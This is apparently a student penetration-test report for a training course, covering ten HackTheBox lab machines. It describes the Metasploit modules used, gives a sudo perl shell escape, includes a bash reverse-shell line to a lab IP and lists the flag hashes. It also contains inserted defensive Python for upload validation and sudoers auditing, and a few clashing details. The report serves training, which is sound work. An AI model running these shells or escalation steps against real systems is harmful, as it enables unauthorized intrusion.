
Penetration Test Report for

Internal Lab and Exam


v.1.0

[email protected]

Gilo Yosef
Copyright © 2021 ITSafe Ltd. All rights reserved.

No part of this publication, in whole or in part, may be reproduced, copied, transferred or any other right reserved to its copyright owner,
including photocopying and all other copying, any transfer or transmission using any network or other means of communication, any broadcast
for distant learning, in any form or by any means such as any information storage, transmission or retrieval system, without prior written
permission from ITSAFE Cyber College.

Table of Contents

1.0 ITSafe Penetration Project Reports 4


1.1 Introduction 4
1.2 Objective 4
1.3 Requirements 4
2.0 High-Level Summary 5
2.1 Recommendations 6
3.0 Methodologies 6
3.1 Information Gathering 6
3.2 Penetration 7
System IP: 10.10.10.4 7
Service Enumeration 7
Privilege Escalation 7
System IP: 10.10.10.40 16
Service Enumeration 16
Privilege Escalation 16
System IP: 10.10.10.5 18
Service Enumeration 18
Privilege Escalation 18
System IP: 10.10.10.95 20
Service Enumeration 20
Privilege Escalation 20
System IP: 10.10.10.8 22
Service Enumeration 22
Privilege Escalation 22
System IP: 10.10.10.14 23
Service Enumeration 23
Privilege Escalation 23
4.0 Additional Items 24
Appendix 1 - Proof and Local Contents: 24

1.0 ITSafe Penetration Project Reports

1.1 Introduction

The ITSAFE Lab penetration test report contains all efforts that were conducted in order to pass the
ITSAFE Project Lab. This report will be graded from a standpoint of correctness and fullness to all
aspects of the Lab. The purpose of this report is to ensure that the student has a full understanding of
penetration testing methodologies as well as the technical knowledge to pass the qualifications for the
ITSAFE Certified Professional.

1.2 Objective

The objective of this assessment is to perform an internal penetration test against the ITSAFE Lab
network. The student is tasked with following a methodical approach in obtaining access to the objective
goals. This test should simulate an actual penetration test and how you would start from beginning to end,
including the overall report. An example page has already been created for you at the latter portions of
this document that should give you ample information on what is expected to pass this course. Use the
sample report as a guideline to get you through the reporting.

1.3 Requirements

The student will be required to fill out this penetration testing report fully and to include the following
sections:

● Overall High-Level Summary and Recommendations (non-technical)
● Methodology walkthrough and detailed outline of steps taken
● Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable
● Any additional items that were not included

2.0 High-Level Summary

I was tasked with performing an internal penetration test against the ITSAFE Project. An internal penetration
test is a dedicated attack against internally connected systems. The focus of this test is to perform attacks
similar to those of a hacker and attempt to infiltrate the HackTheBox\VulnHub internal lab systems. My
overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the
findings back to ITSAFE.

When performing the internal penetration test, several alarming vulnerabilities were identified on
Offensive Security’s network. When performing the attacks, I was able to gain access to multiple machines,
primarily due to outdated patches and poor security configurations. During the testing, I had
administrative-level access to multiple systems. All systems were successfully exploited and access
granted. These systems, together with a brief description of how access was obtained, are listed below:

● 10.10.10.4 (Legacy) - Remote Code Execution vulnerability in Microsoft SMBv1 servers (MS17-010)
● 10.10.10.56 (Shocker) - Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
● 10.10.10.3 (Lame) - Outdated Samba version, remote code execution
● 10.10.10.68 (Bashed) - Exploiting a PHP bash shell to gain initial access, misconfigured sudo rules to escalate to the “scriptmanager” user and a cron job to escalate to root
● 10.10.10.75 (Nibbles) - Arbitrary file upload
● 10.10.10.40 (Blue) - MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
● 10.10.10.5 (Devel) - FTP login enabled, remote file execution
● 10.10.10.95 (Jerry) - Arbitrary file upload
● 10.10.10.8 (Optimum) - Remote code execution
● 10.10.10.14 (Grandpa) - Buffer overflow

2.1 Recommendations

I recommend patching the vulnerabilities identified during the testing to ensure that an attacker cannot
exploit these systems in the future. One thing to remember is that these systems require frequent patching
and, once patched, should remain on a regular patch program to protect against additional vulnerabilities
that are discovered at a later date.

3.0 Methodologies

I utilized a widely adopted approach to penetration testing that is effective in testing how well
the HackTheBox\VulnHub environment is secured. Below is a breakdown of how I was able to identify
and exploit the various systems, including all individual vulnerabilities found.

3.1 Information Gathering

The information gathering portion of a penetration test focuses on identifying the scope of the penetration
test. During this penetration test, I was tasked with exploiting the Lab network. The specific IP addresses
were:

Lab Network

● 10.10.10.4
● 10.10.10.56
● 10.10.10.3
● 10.10.10.68
● 10.10.10.75
● 10.10.10.40
● 10.10.10.5
● 10.10.10.95
● 10.10.10.8
● 10.10.10.14

3.2 Penetration

The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems.
During this penetration test, I was able to successfully gain access to 10.10.10.4 out of the 10.10.14.15
systems.

System IP: 10.10.10.4

Service Enumeration
The service enumeration portion of a penetration test focuses on gathering information about what
services are alive on a system or systems. This is valuable for an attacker as it provides detailed
information on potential attack vectors into a system. Understanding what applications are running on the
system gives an attacker needed information before performing the actual penetration test. In some cases,
some ports may not be listed.

Server IP Address Ports Open

10.10.10.4 TCP: 135, 139, 445

UDP:

Nmap Scan Results:

Remote Code Execution vulnerability in Microsoft SMBv1 servers (MS17-010).

I used Metasploit to gain access via exploit/windows/smb/ms17_010_psexec.

Vulnerability Explanation: Microsoft Security Bulletin MS17-010 was published on March 14, 2017 to
address multiple vulnerabilities in Microsoft Server Message Block 1.0 (SMBv1). The most severe of the
vulnerabilities could allow remote code execution (RCE).

Vulnerability Fix: Security Update for Microsoft Windows SMB Server (4013389), Published:
March 14, 2017

Severity: Critical

Initial Shell Screenshot:

Privilege Escalation
Gained administrative privileges (NT AUTHORITY\SYSTEM) directly from this exploit.

System IP: 10.10.10.56

Service Enumeration
Running dirb against http://10.10.10.56/cgi-bin with -X .sh found a suspicious file path named user.sh.

Server IP Address Ports Open

10.10.10.56 TCP: 80, 2222

UDP:

Nmap Scan Results:

Initial Shell Vulnerability Exploited

I used the multi/http/apache_mod_cgi_bash_env_exec exploit module in Metasploit.

Vulnerability Explanation: Shellshock is a critical bug in Bash versions 1.0.3 - 4.3 that can enable an
attacker to execute arbitrary commands.

Vulnerability Fix: The easiest way to fix the vulnerability is to update Bash through the distribution's
default package manager; this applies to Ubuntu, Debian, CentOS, Red Hat, and Fedora alike.

Severity: Critical

Initial Shell Screenshot:

Privilege Escalation
To gain root I simply used this command: sudo perl -e 'exec "/bin/sh";'

Vulnerability Exploited:

Vulnerability Explanation: Perl can be executed as the root user without any password. The -e switch
allows you to supply Perl code on the command line to be executed, and exec is a Perl function that
replaces the Perl process with the given program, here the shell named in the command.

Vulnerability Fix: Reduce the information leaked by applications; remove compilers or restrict
access to them; apply Linux updates and patches; run file integrity monitoring software; perform
system auditing; and run privilege escalation checkers such as LinEnum or unix-privesc-check to
enumerate and check for possible Linux privilege escalation options, gather information and
determine possible attacks.

Severity: High

Exploit Code:

Proof Screenshot Here:

System IP: 10.10.10.3

Service Enumeration

Server IP Address Ports Open

10.10.10.3 TCP: 21, 22, 139, 445, 3632

UDP:

Nmap Scan Results

Initial Shell Vulnerability Exploited

Additional info about where the initial shell was acquired from

Vulnerability Explanation: The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote
attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function,
when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute
commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share
management.

Vulnerability Fix: A patch against Samba 3.0.24 has been posted at http://www.samba.org/samba/security/

Severity: Critical

Proof of Concept Code Here:

Initial Shell Screenshot:

I used a script from GitHub to gain this shell; afterwards I found a way to gain a reverse shell via
Metasploit with the exploit/multi/samba/usermap_script module.

Privilege Escalation
Root privileges were obtained directly: the initial shell already ran as root.

Vulnerability Exploited:

Vulnerability Explanation:

Vulnerability Fix: A patch against Samba 3.0.24 has been posted at http://www.samba.org/samba/security/

Severity: Critical

Proof Screenshot Here:

System IP: 10.10.10.68

Service Enumeration

Server IP Address Ports Open

10.10.10.68 TCP: 80

UDP:

Nmap Scan Results:

Initial Shell Vulnerability Exploited: a PHP bash shell exposed on the web server gave initial access, followed by misconfigured sudo rules.

Vulnerability Explanation: After enumeration I found a /dev/ directory that gave me a PHP bash
shell. I then escalated to the scriptmanager user through misconfigured sudo rules and to root
through a cron job.

Vulnerability Fix: Install OS updates, correct the sudo configuration and the application
configuration, and install the application patch.

Severity: Critical

Proof of Concept Code Here:

Initial Shell Screenshot:

Privilege Escalation
Misconfigured sudo rules allowed escalation to the “scriptmanager” user, and a cron job allowed escalation to root.

Vulnerability Exploited: I had access to run sudo commands as the scriptmanager user, so I ran the command
“sudo -u scriptmanager /bin/bash”.

Afterwards I found two interesting files in the Script folder.

There is a simple script, ‘test.py’, which writes its output to the file ‘test.txt’. Another interesting
observation is that the creation time of test.txt keeps updating to the current time. This means a cron job
is running which executes the test.py script automatically. If we replace test.py with our own test.py
containing reverse shell code, we might get a reverse shell as root.
On my local machine I created a Python script, also named test.py, and started a web server in the
directory where I saved it. Then I removed the original test.py file on the target, used wget to download my
reverse shell Python script and changed the file permissions with chmod. Afterwards I opened a new listener
on the same port as the Python script, waited a minute, and got root user access.

Vulnerability Explanation:

Vulnerability Fix: Install OS updates, correct the sudo configuration and the application
configuration, and install the application patch.

Severity: Critical

Proof Screenshot Here:

System IP: 10.10.10.75

Service Enumeration

Server IP Address Ports Open

10.10.10.75 TCP: 22, 80

UDP:

Nmap Scan Results:

The Nmap scan found two open ports, 22 and 80.

I started the enumeration on port 80 and gained root permissions in the end.

I located a path named /nibbleblog/ and, after more enumeration with dirb, succeeded in finding more
paths.

I located the admin.php path and successfully logged in due to a weak password.

Then I uploaded my trojan to the web server and gained a reverse shell.

Vulnerability Explanation: An arbitrary file upload vulnerability is a type of security flaw that allows an
attacker to upload malicious files onto a server. This can be done by exploiting a vulnerability in a web
application that doesn't properly validate the file type, or by tricking a user into uploading a malicious
file.

Vulnerability Fix:

● Take the whitelist approach and accept only certain file extensions. This reduces the risk involved with uncommon or unknown extensions.
● Verify files downloaded from the internet just like direct uploads; this helps to prevent arbitrary file upload vulnerabilities. Files downloaded from the internet or uploaded directly by users should be stored in a location that is not publicly accessible.
● Restrict uploads to authenticated users so that the files they upload can be authorized easily. This reduces the chance of random or unauthorized users uploading files to your website.
● Prefer serving files through the application rather than directly from the web server.
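The whitelist, content check and non-public storage recommended above, as an added example that is not part of this report or of the Nibbleblog application: a server-side upload handler in Python. UPLOAD_DIR is an assumed path and the sample files are constructed for the example.

```python
"""Server-side upload handling that applies the fixes listed above: an extension
whitelist, a content check tied to the extension, random server-chosen names and
storage outside the web root. Example code added to this report, not taken from
Nibbleblog; UPLOAD_DIR is an assumed path and the sample files are constructed."""
import os
import secrets

# Whitelist: extension -> magic bytes the content must start with.
ALLOWED_TYPES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
UPLOAD_DIR = "/var/lib/app/uploads"   # assumed: a directory the web server never serves
MAX_BYTES = 2 * 1024 * 1024


def validate_upload(filename: str, data: bytes) -> tuple:
    """Return (accepted, reason). The client-supplied name and type are never trusted."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]   # strip any directory part
    ext = os.path.splitext(name)[1].lower()                 # last extension only
    if ext not in ALLOWED_TYPES:
        return False, f"extension {ext or '(none)'} not whitelisted"
    if len(data) > MAX_BYTES:
        return False, "file too large"
    if not data.startswith(ALLOWED_TYPES[ext]):             # catches shell.php.png
        return False, "content does not match extension"
    return True, "ok"


def storage_name(ext: str) -> str:
    """Random name chosen by the server, so the client's filename never reaches disk."""
    return secrets.token_hex(16) + ext


def store_upload(filename: str, data: bytes, directory: str = UPLOAD_DIR) -> str:
    """Validate, then write under a fresh name with O_EXCL and no execute bit."""
    accepted, reason = validate_upload(filename, data)
    if not accepted:
        raise ValueError(reason)
    path = os.path.join(directory, storage_name(os.path.splitext(filename)[1].lower()))
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path


# Constructed inputs: a genuine PNG header, a PHP file, a PHP file behind a double
# extension, and a path-traversal attempt on an otherwise valid GIF.
SAMPLES = {
    "avatar.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
    "shell.php": b"<?php /* constructed */ ?>",
    "shell.php.png": b"<?php /* constructed */ ?>",
    "../../avatar.gif": b"GIF89a" + b"\x00" * 16,
}


def check_samples(samples: dict = SAMPLES) -> dict:
    """Map each sample name to whether validate_upload accepts it."""
    return {name: validate_upload(name, data)[0] for name, data in samples.items()}


if __name__ == "__main__":
    for name, ok in check_samples().items():
        print(f"{name!r}: {'accepted' if ok else 'rejected'}")
```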

Severity: Critical

Proof of Concept Code Here: please find attached the Nibbles walkthrough file.

Initial Shell Screenshot:

Privilege Escalation
I found that monitor.sh could be run with root permissions; I replaced it with a reverse shell script and
gained root access.

Vulnerability Exploited: I removed the original monitor.sh file and used wget to transfer the
monitor.sh file I had created on my local machine, then changed its permissions so I would be able to
execute it. Afterwards I opened a listener on my local machine with Netcat and then used the sudo command
with the full file path to gain a reverse shell.

Vulnerability Explanation: I could run sudo without supplying a password.

Vulnerability Fix: Correct the sudo configuration.
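Checking for this class of misconfiguration from the defender's side, as an added example that is not part of the original report: the audit below flags the three sudo weaknesses exploited on Shocker, Bashed and Nibbles (passwordless rules, an interpreter run as root, and a target script the invoking user can rewrite). The sudoers rules, the monitor.sh path and the file metadata are constructed to mirror the report's description, not copied from the lab hosts.

```python
"""Audit sudoers rules for the weaknesses this report exploited: passwordless
rules (Shocker, Bashed, Nibbles), a rule handing out an interpreter (perl on
Shocker) and a rule whose target script the invoking user can rewrite
(monitor.sh on Nibbles). Example code added to this report; the rules and the
file metadata are constructed to mirror the report, not taken from the hosts."""
import re
from dataclasses import dataclass

# Interpreters, shells and editors that yield a full shell when run via sudo.
SHELL_GIVERS = {"perl", "python", "python3", "ruby", "bash", "sh", "vi", "vim", "less"}

# Constructed stand-in for os.stat() results: path -> (owner, mode).
FILES = {
    "/usr/bin/perl": ("root", 0o755),
    "/usr/sbin/service": ("root", 0o755),
    "/home/nibbler/personal/stuff/monitor.sh": ("nibbler", 0o755),  # assumed path
}

# Constructed sudoers content modelled on the three lab hosts plus one sane rule.
SAMPLE_SUDOERS = """
Defaults env_reset
root     ALL=(ALL:ALL) ALL
shelly   ALL=(root) NOPASSWD: /usr/bin/perl
www-data ALL=(scriptmanager) NOPASSWD: ALL
nibbler  ALL=(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
deploy   ALL=(root) /usr/sbin/service nginx restart
"""

# user host=(runas) [TAG: ...] command[, command...]
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*"
                     r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


@dataclass
class Finding:
    user: str
    runas: str
    command: str
    issues: list


def audit_sudoers(text: str, files: dict = FILES) -> list:
    """Return one Finding per (user, command) that carries at least one weakness."""
    findings = []
    for raw in text.splitlines():
        m = RULE_RE.match(raw.split("#", 1)[0].strip())
        if not m or m["user"] == "root":          # root's own rule is expected
            continue
        nopasswd = "NOPASSWD" in m["tags"]
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            issues = ["no password required"] if nopasswd else []
            if cmd == "ALL":
                issues.append("any command permitted")
            else:
                path = cmd.split()[0]              # drop arguments
                if path.rsplit("/", 1)[-1] in SHELL_GIVERS:
                    issues.append("interpreter grants a shell")
                meta = files.get(path)
                if meta and (meta[0] != "root" or meta[1] & 0o022):
                    issues.append("target not root-owned or writable by others")
            if issues:
                findings.append(Finding(m["user"], m["runas"], cmd, issues))
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f.user} -> ({f.runas}) {f.command}: {', '.join(f.issues)}")
```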

Severity: High

Exploit Code:
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.15/1234 0>&1

Proof Screenshot Here:

Proof.txt Contents:

System IP: 10.10.10.40

Service Enumeration

Server IP Address Ports Open

10.10.10.40 TCP: 135, 139, 445, 49152, 49153, 49154, 49155, 49156, 49157

UDP:

Nmap Scan Results:

Initial Shell Vulnerability Exploited

Additional info about where the initial shell was acquired from
Vulnerability Explanation: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

Vulnerability Fix: On March 14, 2017 Microsoft released a security update for Microsoft Windows SMB
Server. The security update addresses the vulnerabilities by correcting how SMBv1 handles specially
crafted requests.

Severity: Critical

Proof of Concept Code Here:

Initial Shell Screenshot:

Privilege Escalation
This exploit gained access as NT AUTHORITY\SYSTEM, i.e. full control of the kernel in ring 0.

Vulnerability Fix: On March 14, 2017 Microsoft released a security update for Microsoft Windows SMB
Server. The security update addresses the vulnerabilities by correcting how SMBv1 handles specially
crafted requests.

Severity: Critical

Exploit Code:

Proof Screenshot Here:

Proof.txt Contents:

System IP: 10.10.10.5

Service Enumeration

Server IP Address Ports Open

10.10.10.5 TCP: 21, 80

UDP:

Nmap Scan Results:

Port 80 is open with Microsoft IIS on it.

Port 21 FTP is also open.

Vulnerability Explanation: An .aspx trojan file was uploaded; afterwards I opened its path in the
browser while a Metasploit handler was listening.

Vulnerability Fix: Anonymous FTP login must be disabled.

Anonymous FTP is disabled by default for the security of your account. We do not recommend using
anonymous FTP because it allows any person to access FTP without identifying themselves, which is a
security risk.

Severity: High

Proof of Concept Code Here:

Initial Shell Screenshot:

Privilege Escalation
Vulnerability Exploited:

I used the post/multi/recon/local_exploit_suggester module and succeeded in gaining admin privileges with
exploit/windows/local/ms13_053_schlamperei.

Vulnerability Fix: On July 9, 2013 Microsoft released a security update for this vulnerability.

This security update resolves two publicly disclosed and six privately reported vulnerabilities in
Microsoft Windows. The most severe vulnerability could allow remote code execution if a user views
shared content that embeds TrueType font files. An attacker who successfully exploited this vulnerability
could take complete control of an affected system.

Severity: High

Exploit Code:

Proof Screenshot Here:

Proof.txt Contents:

User’s flag

Root’s flag

System IP: 10.10.10.95

Service Enumeration

Server IP Address Ports Open

10.10.10.95 TCP: 8080

UDP:

Nmap Scan Results:

After opening the URL http://10.10.10.95:8080 in the browser and confirming that the Tomcat
server is accessible, I noticed the ‘Manager App’ portal.

This portal is password protected. After trying the default Tomcat password, I was able to see the
password on the “Authentication Denied” page due to a developer mistake.

Vulnerability Explanation: Since there is an option to upload WAR files, I created a trojan WAR file
with msfvenom named jerry.war, started a listener, opened the trojan WAR file and received a
reverse shell.

Vulnerability Fix: Use a strong password to prevent attackers from gaining access with default
passwords.

Keep the server updated.

Severity: High

Proof of Concept Code Here:

Initial Shell Screenshot:

Privilege Escalation

Root flag has been found.

System IP: 10.10.10.8

Service Enumeration

Server IP Address Ports Open

10.10.10.8 TCP: 80

UDP:

Nmap Scan Results:

Initial Shell Vulnerability Exploited

Additional info about where the initial shell was acquired from: port 80 is open with a vulnerable
HttpFileServer version.

Vulnerability Explanation: A remote, unauthenticated user may be able to run arbitrary operating
system commands on the server.

Vulnerability Fix: This issue is addressed in HFS version 2.3c and later.

Severity: Critical

Proof of Concept Code Here: I used the exploit/windows/http/rejetto_hfs_exec module in Metasploit.

Initial Shell Screenshot:

Privilege Escalation
For the privilege escalation I used the post/multi/recon/local_exploit_suggester module in Metasploit.

The exploit/windows/local/ms16_032_secondary_logon_handle_privesc module gained me root access.

Vulnerability Exploited: The remote Windows host is affected by an elevation of privilege vulnerability
in the Windows Secondary Logon Service due to improper management of request handles in memory.
An authenticated, remote attacker can exploit this, via a specially crafted application, to elevate
privileges, allowing the execution of arbitrary code.

Vulnerability Explanation:

Vulnerability Fix: Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012,
8.1, RT 8.1, 2012 R2, and 10.

Severity:

Exploit Code: I used the exploit/windows/local/ms16_032_secondary_logon_handle_privesc module in
Metasploit. I set the session in the module and gained root access.

Proof Screenshot Here:

Proof.txt Contents: please find attached the walkthrough file.

use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set session 1
set lhost 10.10.14.10
exploit

System IP: 10.10.10.14

Service Enumeration

Server IP Address Ports Open

10.10.10.14 TCP: 80

UDP:

Nmap Scan Results:

The Nmap result showed a vulnerable Microsoft IIS 6.0 version.

Vulnerability Explanation: This is a typical buffer overflow vulnerability. The affected system reported
(by the researcher) is Windows 2003 with IIS version 6. The vulnerability could be exploited with an
overly large ‘IF’ header in a ‘PROPFIND’ request containing at least two HTTP resources in the IF header. If
successfully exploited, this vulnerability could lead to remote code execution. Sometimes an
unsuccessful attack could still lead to denial-of-service conditions.

Vulnerability Fix: IIS 6.0 was included with Windows Server 2003; unfortunately, Microsoft isn't
supporting and won't be patching the old OS version anymore. To mitigate the risk, disabling the
WebDAV service on the vulnerable IIS 6.0 installation is recommended. Newer versions of Windows
Server shipped with newer versions of IIS are not affected by this vulnerability.

Severity: Critical

Proof of Concept Code Here:

Privilege Escalation
For the privilege escalation I used the post/multi/recon/local_exploit_suggester module in
Metasploit; after trying some modules offered by the suggester, I gained root access with the
exploit/windows/local/ms10_015_kitrap0d module.

Vulnerability Explanation: This module will create a new session with SYSTEM privileges via the
KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated then the exploit will not
run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.

Vulnerability Fix: On February 9, 2010 Microsoft released an important update to fix this
vulnerability.

This security update resolves one publicly disclosed and one privately reported vulnerability in
Microsoft Windows.

The update is rated Important for all supported editions of Microsoft Windows 2000, Windows XP,
Windows Server 2003, Windows Vista, Windows Server 2008, and Windows 7 for 32-bit systems (see the
bulletin's Affected and Non-Affected Software subsection for details).

The update addresses the vulnerabilities by ensuring that the Windows kernel handles exceptions
properly.

Severity: Critical

Exploit Code: the exploit/windows/local/ms10_015_kitrap0d module in Metasploit.

Proof Screenshot Here:

Proof.txt Contents:

4.0 Additional Items

Appendix 1 - Proof and Local Contents:

IP (Hostname)           Proof.txt Contents
10.10.10.4 (Legacy)     993442d258b0e0ec917cae9e695d5713
10.10.10.56 (Shocker)   52c2715605d70c7619030560dc1ca467
10.10.10.3 (Lame)       e6778635918aa42689951738d5fdddab
10.10.10.68 (Bashed)    d032d3cafb6276834f1dc8fdf1deb840
10.10.10.75 (Nibbles)   e7e3a76cbcabbde3a4e7624cea9eb691
10.10.10.40 (Blue)      2c9eb8dd2d4752ae890cfb535977ffaf
10.10.10.5 (Devel)      5b65556f2792e9ce33f01776839d639f
10.10.10.95 (Jerry)     04a8b36e1545a455393d067e772fe90e
10.10.10.8 (Optimum)    51ed1b36553c8461f4552c2e92b3eeed
10.10.10.14 (Grandpa)   9359e905a2c35f861f6a57cecf28bb7b
